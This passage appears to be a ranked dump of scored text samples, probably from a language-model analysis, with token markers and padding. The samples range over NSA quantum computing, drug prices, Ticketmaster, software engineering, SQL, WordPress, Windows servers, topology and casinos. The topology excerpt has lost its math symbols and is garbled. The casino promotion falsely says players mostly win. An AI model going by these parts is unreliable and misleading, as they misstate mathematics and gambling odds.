this approach. - -By contrast, quantum computers exploit properties of matter that, under certain conditions, mean the machine can carry out lots and lots of calculations simultaneously. This makes it practical to try all the possible keys protecting a particular message or stream of data. - -The hard part of creating a working quantum computer is keeping enough of its constituent computational elements, called qubits, stable so they can interact and be put to useful work. - -The NSA is not believed to have made significant breakthroughs in its work that would put it ahead of research efforts elsewhere in the US and Europe. However, the documents passed to the Post by Edward Snowden suggest the agency's researchers are having some success developing the basic building blocks for the machine.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 56; Score = 4063232.0 -<|begin_of_text|>Patients used to pay $10,000 a year for cancer drugs, but now they’re paying $10,000 a month, according to HBO talk show host Bill Maher. - -That’s a message circulating on Facebook recently, promoted by the "Bill Maher Fanpage." A reader asked us to check it out. - -The quote comes from the Oct. 2 episode of Real Time with Bill Maher, where Maher discussed Turing Pharmaceuticals, the company that jacked up the cost of a life-saving drug from $13.50 to $750 essentially overnight. - -"Not that (Turing CEO Martin) Shkreli is unusual for the pharmaceutical industry," Maher said on his show. "Fifteen years ago, cancer drugs cost an average of $10,000 a year. Now it’s $10,000 a month because this cartel owns the U.S. government every bit as much as Mexican drug lords own theirs." - -It’s well known that the cost of health care is on the rise, but has the annual cost of cancer drugs really increased so dramatically in just a decade and a half? - -Maher’s team sent us links to some news articles about the rising cost of cancer drugs, and we tracked down information that speaks to his claim. - -The best information we could nail down is the cost of anticancer drugs at launch, the initial price when the Federal Drug Administration approves a drug. - -These are the sticker prices set by the pharmaceutical companies, not the prices patients actually pay out of pocket, which are reduced by insurance payments, patient assistance programs and other discounts. Costs increases, though, are often passed on to consumers. - -Maher has a point that cancer drug costs are on the rise. We charted the launch costs of cancer drugs the FDA approved since 1999, using a list compiled by Memorial Sloan Kettering Cancer Center. - -The second half of Maher’s statement -- that cancer drugs now cost about $10,000 a month -- is also on solid ground. Of drugs approved in 2015, the monthly average cost is $11,319. And experts in the field often cite that $10,000 figure themselves. - -Because many cancer drugs are not administered to patients for a full year, it’s difficult to determine an average annual cost, so the first half of Maher’s statement -- that they cost about $10,000 a year 15 years ago -- is hard to nail down. To his point, though, the monthly cost of a new drug was dramatically lower in 2000 than what it is now at about $4, -================================================================================ -Rank = 57; Score = 4030464.0 -<|begin_of_text|>You must enter the characters with black color that stand out from the other characters - -Message: * A friend wanted you to see this item from WRAL.com: http://wr.al/14Iqb - -— Customers that purchased a ticket through Ticketmaster between late 1999 and early 2013 could be eligible for free tickets to a number of events. - -An email sent to eligible Ticketmaster customers includes instructions on how to get vouchers for free tickets to selected events as well as discounts on Ticketmaster purchases. Those who bought a ticket through the company between Oct. 21, 1999, and Feb. 27, 2013, are eligible. The vouchers expire in four years. - -The vouchers are the result of a class-action lawsuit over ticket fees and other charges. - -Frank Manginaro, of Chatham County, is one of about 57 million people who recently received a voucher. - -He said he was thrilled until the site started giving him an error message when he attempted to use the voucher code. - -"All of a sudden they are giving me excuses saying it doesn't work, you can't buy tickets, try again later," he said. "I was upset about it, and so were my friends because they couldn't even get through." - -After trying for two days, Manginaro tried again and found a way to get tickets. He said he ignored the voucher link on the Ticketmaster website and went straight to the band's page. - -"I just skipped over it and went straight to the Counting Crows and ordered it through there. It went through with no problem," he said. - -According to the settlement, Ticketmaster is required to distribute 42 million dollars in vouchers in the next four years. - -Ticketmaster is now part of Beverly Hills-based Live Nation Entertainment Inc.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 58; Score = 3997696.0 -<|begin_of_text|>Micro Service Architecture is an architectural concept that aims to decouple a solution by decomposing functionality into discrete services. Think of it as applying many of the principles of SOLID at an architectural level, instead of classes you've got services. - -Conceptually speaking MSA is not particularly difficult to grasp but in practice it does raise many questions. How do these services communicate? What about latency between services? How do you test the services? How do you detect and respond to failure? How do you manage deployments when you have a bunch of interdependencies? So lets expand on some of these throughout this post and see if MSA really is worth the effort. - -Anatomy of a Micro Service - -First things first what actually is a micro service? Well there really isn't a hard and fast definition but from conversations with various people there seems to be a consensus that a micro service is a simple application that sits around the 10-100 LOC mark. Now I realise that line count is an atrocious way to compare implementations so take what you will from that. But they are small, micro even. This means you're not going to find hundreds of tiny services built on top of large frameworks, it's simply not practical. No, simplicity and lightweightyness (not a real word) is the order of the day here. Small frameworks like Sinatra, Webbit, Finagle & Connect do just enough to allow you to wrap your actual code in a thin communication layer. - -In terms of a footprint these services will be small, you're potentially going to run a lot of them on the same machine so you don't want to be holding on to memory or resources that you aren't intending to use. Once again simple libraries over large frameworks will win out, you'll also find less of a reliance on 3rd party dependencies. - -This decoupling at a service level also offers another interesting option. We've pushed a lot of the old application complexity down to infrastructure level. We are no longer bound to a single stack or language. We can play to the strengths of any stack or language now. It's entirely possible to have a system built out with a myriad of languages and libraries, though as we will touch on later this is a double edged sword. - -You're also not going to find any true micro service based architectures that are hosted in an application server, that kinds of defeats the point. To this end micro services self host, they grab a port and listen. This means you'll lose any benefits your typical enterprise application server may bring and your service -================================================================================ -Rank = 59; Score = 3981312.0 -<|begin_of_text|>If I asked you to name major Java vendors, chances are EMC's VMware subsidiary wouldn't top the list. To most of us, the "VM" in VMware doesn't stand for the Java Virtual Machine; it means the other kind of virtual machine, the kind that lets you run servers and desktops on virtualized OS instances. But if that's your assumption, it may be time to change your thinking. - -VMware is reinventing itself. Virtualization may have been the hot topic a few years ago, but its star faded once the OS vendors got into the game. Now cloud computing is the buzzword of the day. Observing the trends, Redmonk analyst James Governor went as far as to declare "cloud [computing] is the new VMware." Naturally, then, the new VMware is cloud computing -- and that puts Java square in its sights. - -[ Subscribe today to InfoWorld's Developer World newsletter and stay up to date on the key software development news and insights. ] - -At the Google I/O conference in San Francisco this week, VMware and Google announced a partnership aimed at making it easier for Java developers to deploy applications on the Google App Engine cloud computing service. This new deal comes hot on the heels of a similar arrangement VMware struck with Salesforce.com in late April, in which VMware provided infrastructure to allow Java apps to run on Salesforce's Force.com platform. - -With these partnerships, VMware is putting its customers on notice that it's not merely a virtualization vendor, but a full-service provider of solutions for cloud computing. But developers should take notice, too, because if VMware continues down this path, it could potentially mean a whole new era for the Java platform. - -Write once, cloud everywhere - -Sun Microsystems dubbed Java the "write once, run anywhere" language, but Java developers have always taken that phrase with a grain of salt. Early in the platform's history, Microsoft deliberately tried to fragment the Java market by shipping its own, incompatible version -- but even Sun's own JVM could be inconsistent from OS to OS. Apple, once a Java backer, dropped support for the language from its Mac OS X developer platform and won't allow it on the iPhone or iPad. The Java ME market is hopelessly fragmented. Browser applets are dead. - -The bright spot for Java has always been the datacenter. But as I've mentioned before, cloud computing has the potential to fragment the server-side Java market, by encouraging developers to code their applications to a specific cloud vendor's services and requirements. For example, unlike Force.com, -================================================================================ -Rank = 60; Score = 3899392.0 -<|begin_of_text|>Anyone who had to schedule an intercontinental phone call knows that there is no such thing as a simple time called now. What you should rather think about is a time comprised of here and now. - -The Earth rotates around its own axis. When it’s solar noon (the sun is at its highest position) in one place, it’s already past noon in places to the east and it’s still before noon in places to the west. - -To make communication easier, at the end of the 19th century, the Earth was divided into 24 hour-wide time zones. All places within one time zone have the same time. It was decided that the “0” time zone would be London’s time zone. The “0” time zone is nowadays called UTC (Coordinated Universal Time) or, for historic reasons, GMT (Greenwich Mean Time). In general, the time zones’ boundaries follow countries’ boundaries though some large countries are located in multiple time zones. For example, USA is located in 7 different time zones, Canada in 6, but China is in one time zone. There are time zones with offsets of 30 minutes or even 45 minutes (Nepal). To make things even more complicated, many countries also have daylight saving time: they turn the clock back or forward one hour on specific days to account for seasonal changes in daylight. - -If your computer system is international, it has to be ready to handle users from different time zones. The users want to see the time of system events expressed in their local time zone: - -In an online course, you want to see the assignment deadline in your own time zone. You don’t want to submit your assignment and find out that the deadline has passed. - -In an auction system you want to know at exactly what time the auction ends. You don’t want to try bidding and find out that the auction ended three hours earlier. - -You want to know the time when a promotion ends. Ideally, if the promotion ends on a specific day, you want the promotion to run until the end of the day in UTC-11 time zone. - -All databases have types which handle both date and time. The types are called timestamp or datetime, or something similar. They usually come in two flavors: one without time zone and the other with time zone. - -Timestamp without time zone is generally a fancy string value. It does not interpret the time zone. If you enter the value “2015-01-28 13:00:00,” the same value will be shown to all users. - - -================================================================================ -Rank = 61; Score = 3866624.0 -<|begin_of_text|>Interpreted, dynamically typed languages such as Python, Ruby or Javascript are: easy to use, allow fast development and have a great number of libraries. Unfortunately, they are not very good when it comes to performance. - -For this reason, I felt the need to look for something different for some projects. However, I didn't want to lose the simplicity other languages gave me. Essentially, I wanted something that could give me: - -Good performance - -Easy concurrency - -Easy error handling - -Safety - -Fast development time - -Good libraries to ease my development - -Go was the obvious choice - I had previously worked with it and knew I could achieve all of these points. - -So what is Go? - -From the Go documentation page - -Go is an attempt to combine the ease of programming of an interpreted, dynamically typed language, with the efficiency and safety of a statically typed, compiled language. - -An attempt which I believe was mostly successful. But let's dive into some points to understand Go's beauty. - -Simple and easy - -Go is a "simple" language - it only contains 25 keywords (Python 3.5.0: 33, Ruby 2.2.0: 41, ANSI C: 32). Obviously, a small number of keywords doesn't necessarily mean it's easy - Brainfuck only has 8 and its name suggests how easy it is to program in it. - -And Go does have trade-offs for using such a small number of keywords. For example, it only has one loop (keyword for ), which can be seen has a nice thing since you really only have to know one word. But it can take several forms: - -for condition behaves like a while - -behaves like a while for i,v := range list ranges over a list - -ranges over a list for i=0;i<10;i++ for a C style classical for - -which might confuse/annoy some people. - -However, I do believe Go is easy to understand and learn, and you can see it for yourself by doing the - -Golang Tour, which will teach you the essentials. - -Standard Library - -Furthermore, Go has got a robust standard library which allows quick and easy development of common essential tasks: - -net (http, mail) - -archives (zip, tar, gzip) - -encodings (json, csv) - -cryptography (aes, des, md5) - -html template system - -generic sql drivers - -logging system - -and many others... - -Easy to read - -Any programmer can tell you that reading other people's (including your past self) code is a daunting, hair- -================================================================================ -Rank = 62; Score = 3833856.0 -<|begin_of_text|>There are some reasons why anyone will prefer visiting the casinos in Malaysia than with most other places. Malaysian casinos have several advantages over most casinos available other places in the world. These advantages make them popular in so many ways over the rest of casinos in other places. Below is an outline of the reasons why the next time you are out gambling you should think about hitting the Malaysia casino. - -Different Games - -In Malaysia, you will get to enjoy some games from blackjacks, betting to poker among others. With so many games to choose from, it is hard to get bored playing. If one game does not appeal to you, you can move on to the next one and get to enjoy. Having a pool of games form which to choose from will always make the gambling interesting. It will also attract different kinds of people. Having different people to play against will in a great way increase the chances that you have of making a good return. - -Great Payouts - -Another thing that makes most people prefer playing in Malaysian casinos is because of the great payouts that are offered. From the games that are available, it is quite easy t even double your initial investment in just a few minutes of playing. You will get to enjoy great payouts that in most cases, you will win than lose. Having this in mind will always make gambling somewhat appealing. All that one needs to do is to exercise caution while playing. - -Security - -Malaysian casinos are some of the most secure casinos in the world. For a gambler, security is crucial since they deal with money. One needs to be sure that the money they win will be in safe hands. A casino that ensures that the player is protected will always be a preferred option by the players. Some of the casinos even go to extra lengths of providing escort for their players so that they do not get robbed. - -Privacy - -A casino player will always value their privacy. Malaysian casino knows and understands this. Great measures are usually taken to ensure that people who request to remain anonymous remain so. Some people come from high-end families or are powerful people in the country. They might be people who wouldn’t want their identities revealed. When this is the case, they would want to still enjoy their game without constantly worrying who might see them. Malaysian casinos will do all that is possible to ensure that the identity of such people is protected. - -From the above, it is evident that Malaysian casinos are some of the best in the world. There is so much that they have put in to ensure that their clients have a wonderful experience at all -================================================================================ -Rank = 63; Score = 3833856.0 -<|begin_of_text|>Let be a natural number. A basic operation in the topology of oriented, connected, compact, -dimensional manifolds (hereby referred to simply as manifolds for short) is that of connected sum: given two manifolds, the connected sum is formed by removing a small ball from each manifold and then gluing the boundary together (in the orientation-preserving manner). This gives another oriented, connected, compact manifold, and the exact nature of the balls removed and their gluing is not relevant for topological purposes (any two such procedures give homeomorphic manifolds). It is easy to see that this operation is associative and commutative up to homeomorphism, thus and, where we use to denote the assertion that is homeomorphic to. - -(It is important that the orientation is preserved; if, for instance,, and is a chiral 3-manifold which is chiral (thus, where is the orientation reversal of ), then the connect sum of with itself is also chiral (by the prime decomposition; in fact one does not even need the irreducibility hypothesis for this claim), but is not. A typical example of an irreducible chiral manifold is the complement of a trefoil knot. Thanks to Danny Calegari for this example.) - -The -dimensional sphere is an identity (up to homeomorphism) of connect sum: for any. A basic result in the subject is that the sphere is itself irreducible: - -Theorem 1 (Irreducibility of the sphere) If, then. - -For (curves), this theorem is trivial because the only connected -manifolds are homeomorphic to circles. For (surfaces), the theorem is also easy by considering the genus of. For the result follows from the prime decomposition. But for higher, these ad hoc methods no longer work. Nevertheless, there is an elegant proof of Theorem 1, due to Mazur, and known as Mazur’s swindle. The reason for this name should become clear when one sees the proof, which I reproduce below. - -Suppose. Now consider the infinite connected sum - -This is an infinite connected sum of spheres, and can thus be viewed as a half-open cylinder, which is topologically equivalent to a sphere with a small ball removed; alternatively, one can contract the boundary at infinity to a point to recover the sphere. On the other hand, by using the associativity of connected sum (which will still work for the infinite connected sum, if one thinks about it carefully -================================================================================ -Rank = 64; Score = 3817472.0 -<|begin_of_text|>Subdomains can be a tricky thing to work with. Here are some tips to develop and test Rails applications using them. - -Develop - -During development there are a few ways you can handle subdomains. If you are using the bundled webrick server, you won't be able to access your subdomain at all. - -Using lvh.me - -If you are using the webrick server or something like Puma for development you can use lvh.me to access your subdomains. e.g. - -http://sub.lvh.me:9292/ - -'lvh.me' resolves to localhost, so this provides access to the subdomain in Rails on port 9292 (the Puma default). This is convenient but can be very slow to work with. - -Editing your hosts file - -To avoid having to do a round trip to the internet you can add a record to your machine hosts file. In Unix/mac you can find it on /etc/hosts - -You can add something like: - -127.0.0.1 sub.virtual.local - -Then you should be able to access your subdomain using the built in web server or puma by going to: (again 9292 is the port used by puma): - -http://sub.virtual.local:9292/ - -Using Pow (Only available for Mac) - -Pow makes it extremely easy to work with subdomains: - Install pow - Link your application - Access the application using a subdomain e.g. sub.app.dev - -Have a look at the powder gem, it makes installing pow even easier. - -Testing - -Capybara needs to hit a real webserver in order to test your application. So you will have the same challenge as when accessing it on development. - -CI - -The easiest way is to use `lvh.me' for this (as long as your CI server can resolve it). - -Add a couple of methods accessible by your tests, e.g. in spec/support/subdomains.rb : - -def switch_to_subdomain ( subdomain ) # lvh.me always resolves to 127.0.0.1 Capybara. app_host = "http:// #{ subdomain }.lvh.me" end def switch_to_main_domain # Capybara.app_host = "http://lvh.me" end - -Then in your feature test you can do: - -switch_to_subdomain ('sub' ) - -Testing on your local machine - -The above approach should work on your local machine as well, but it still wasteful as it is doing a round trip to lvh.me. I found it useful to do the -================================================================================ -Rank = 65; Score = 3817472.0 -<|begin_of_text|>Many software developers find they need to store hierarchical data, such as threaded comments, personnel org charts, or nested bill-of-materials. Sometimes it’s tricky to do this in SQL and still run efficient queries against the data. I’ll be presenting a webinar for Percona on February 28 at 9am PST. I’ll describe several solutions for storing and querying trees in an SQL database, including the design I call Closure Table. - -In Closure Table, we store every path in a tree, not only direct parent-child references, but also grandparent-grandchild, and every other path, no matter how long. We even store paths of length zero, which means a node is its own parent. So if A is a parent of B, and B is a parent of C and C is a parent of D, we need to store the following paths: A-A, A-B, A-C, A-D, B-B, B-C, B-D, C-C, C-D, D-D. This makes it easy to query for all descendants of A, or all ancestors of D, or many other common queries that are difficult if you store hierarchies according to textbook solutions. - -CREATE TABLE TreePaths ( - -ancestor CHAR(1) NOT NULL, - -descendant CHAR(1) NOT NULL, - -length INT NOT NULL DEFAULT 0, - -PRIMARY KEY (ancestor, descendant) - -) ENGINE=InnoDB; - -Because there isn’t much written about using the Closure Table design, I periodically get questions about how to solve certain problems. Here’s one I got this week (paraphrased): - -I’m using Closure Table, which I learned about from your book and your presentations. I can neither find nor invent a pure-SQL solution for moving a subtree to a new position in my tree. Right now, I’m reading the nodes of the subtree into my host script, deleting them and re-inserting them one by one, which is awful. Are you aware of a more efficient solution for moving a subtree in this design? - -Moving subtrees can be tricky in both Closure Table and the Nested Sets model. It can be easier with the Adjacency List design, but in that design you don’t have a convenient way to query for all nodes of a tree. Everything has tradeoffs. - -In Closure Table, remember that adding a node involves copying some of the existing paths, while changing the endpoint for descendant. When you’re inserting a single new node, you just have one descendant to add, joined to all the paths of its ancestors. - -Here -================================================================================ -Rank = 66; Score = 3801088.0 -<|begin_of_text|>Every time someone tells me, “This database is mission critical – we can’t have data loss or downtime,” I just smile and shake my head. Technology is seriously difficult. - -To illustrate, here’s a collection of client stories from the last few years: - -The DBCC CHECKDB job ran every week just like it was supposed to – but it failed due to corruption every week. No one got email alerts because the SQL Agent mail was no longer valid – internal email server changes meant the mail was just piling up in SQL Server. CHECKDB had been failing for three years, longer than the backups were kept. Data was permanently lost. The DBA configured his backups to write to a file share. The sysadmins never understood they were supposed to back up that file share. When the DBA asked for a restore, he was surprised to find there were no backups. Three SQL Servers were all replicating data to each other. When I asked the DBA where the backups were run, he looked at one server, then another, then the third. He sheepishly admitted – in front of his manager – that there were no backups done anywhere. The DBA set up full backups daily, plus log backups of all databases in full recovery mode. Later, she put a few databases into simple recovery mode in order to fix an issue. She forgot to put them back into full recovery mode. When problems struck and she needed to recover a database, she lost all data back to the prior full backup. The SQL Server ran out of space on the C drive. During emergency troubleshooting, someone deleted a bunch of BAK files. The server started up, but databases were offline and corrupt. Turned out the user databases were on the C drive, as were all of the backups – the very backups that were just deleted to free up space. The DBA started getting odd corruption errors on one of his servers, then more, and quickly all of them. The SAN admin had flashed the storage with new firmware – which had a bug. The DBA was writing his backups to that same SAN, and sure enough, some of the corrupt databases had corrupt backups too. The admin wanted to restore the production databases onto another server. He tried, but it kept saying the files were in use. He stopped the SQL Server service, deleted the files, started it again, and finally his restore worked – but his phone lit up. Turned out he’d remote desktopped into the wrong server – he was on production. The developer did a deployment on -================================================================================ -Rank = 67; Score = 3784704.0 -<|begin_of_text|>To extend the functionality of WordPress most people have only heard of the use of plugins. Not many people have heard of the term Dropins. WordPress has it's core functionality which can be added to by the use of plugins which take advantage of multiple WordPress hooks and actions, but it also allows you to replace functionality with the use of Dropin files. Unlike a plugin the Dropin file will not need to be activated and will become activate when it is placed in the wp-content folder. This folder will by default be at the root of your WordPress install, but can be defined by changing the constant variable WP_CONTENT_DIR. - -// Custom content directory define( 'WP_CONTENT_DIR', dirname( __FILE__ ). '/wp-content' ); define( 'WP_CONTENT_URL', 'http://'. $_SERVER['HTTP_HOST']. '/wp-content' ); - -An example of how WordPress will include these Dropin files can be seen in the WordPress core code, here is an example of displaying the maintenance.php as you can see it uses the constant WP_CONTENT_DIR. - -if ( file_exists( WP_CONTENT_DIR. '/maintenance.php' ) ) { require_once( WP_CONTENT_DIR. '/maintenance.php' ); die(); } - -When you place your Dropin files in the wp-content folder you can see this from the plugin maintenance screen /wp-admin/plugins.php?plugin_status=dropins. To get a list of available dropin's there is a function in /wp-admin/includes/plugin.php called _get_dropins(), this will return the following list of dropin's. ## Single Site Install - -advanced-cache.php - Advanced caching plugin. Allows you to replace the caching functionality of your WordPress site. Activated by defining a constant variable WP_CACHE in the wp-config.php file. - -db.php - Custom database class. Used to create you own database class. Activated on load. - -db-error.php - Custom database error message. Used to display your own custom database error message. Activated on load. - -install.php - Custom install script. Used to customise your own WordPress install script. Activated on load. - -maintenance.php - Custom maintenance message. Used to create your own WordPress custom message. Activated on load. - -object-cache.php - External object cache. Used to create your own object caching class. Activated on load. - -Additional Multisite Dropin's<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 68; Score = 3784704.0 -<|begin_of_text|>Most likely, as a reader you are mostly interested in my scripts. Here are my scripts for setting up Windows Server 2012 R2 ready for WebDeployments and running EPiServer ASP.NET site! - -Why automate the installation? - -This blog is about how to make your brand new Windows Server ready for WebDeployments with just pressing enter once. Cloud services can make your infrastructure lifecycle handling very easy; still people often encounter situations where they need to host our ASP.NET applications in virtual machines or directly on physical hardware. On those situations installation procedures in Windows operating systems are often done with some “clickety click” magic that won’t take too long. Still the “clickety click” installations have lots of long-term problems: - -Installations can’t be reproduced - -Only the installer knows how he did it - -If you have multiple servers you are doing same manual steps multiple times - -Base of the installations does not differ much from project to project - -After few years when your windows server needs upgrade you will need to repeat this - -There is no way to test “clickety click” installations - -Windows Server Core installations are rare because people is not used to manage Windows Servers without GUI - -One could argue that documentation and clear processes would take care of all the problems above. Maybe they could but I have never seen installation documentation that has 100% coverage over how the installation has been done. Installation script works as document and developers are more likely to update it! - -What needs to be installed on a fresh Windows server - -Here is short version of my list what I would do for new Windows Server - -Install IIS - -Install WebPI - -Install newest.NET - -Install webdeploy - -Install various modules for IIS from windows feature list or with WebPI - -Install tools for administration (7zip, text editor etc) - -Create IIS site and application pool and change some defaults for better - -Is there PackageManagement for Windows? - -Oh yes there is! It is called Windows PackageManagement (aka OneGet). Unfortunately it is not available for Windows Servers yet. Production preview of Windows Management Framework 5 is already available. Windows PackageManagement is actually a manager that can access multiple type of repositories to have unified way to download and install software from multiple sources. Microsoft MSI installers, Windows Features and software could be all installed with Windows PackageManagement in the future. The thing still missing is grown up economy where all the toys would be easily available in a secure manner. Chocolatey is pretty good already but it is missing a lot of software and I’m still sceptical about -================================================================================ -Rank = 69; Score = 3768320.0 -<|begin_of_text|>On October 13, our teams will be performing an extended maintenance to make networking improvements on our servers. This maintenance will affect our Arc platform as well as all pages on our arcgames.com domain and games hosted from our servers that are launched from Arc and other platforms. The following games and services will be inaccessible during maintenance: - -Arc Games forums - -Arc Games main website, product pages and news pages - -Arc Games platform including billing and messaging - -Arc Games support websites - -Battle of the Immortals - -Blacklight Retribution (launched from Arc Games) - -Champions Online - -Forsaken World - -Fortuna - -Jade Dynasty - -Neverwinter (PC & Xbox One) - -PWI - -Star Trek Online - -Swordsman - -War of the Immortals - -Additional games launched from Arc Games - -We anticipate this maintenance to run from October 13 starting at 6:00 am PT and running to 6:00 pm PT. We will be providing updates via our Arc Twitter page and Facebook page as well as social channels for each of our titles. - -We appreciate your patience as we work to improve our platform. - -Arc Team<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|e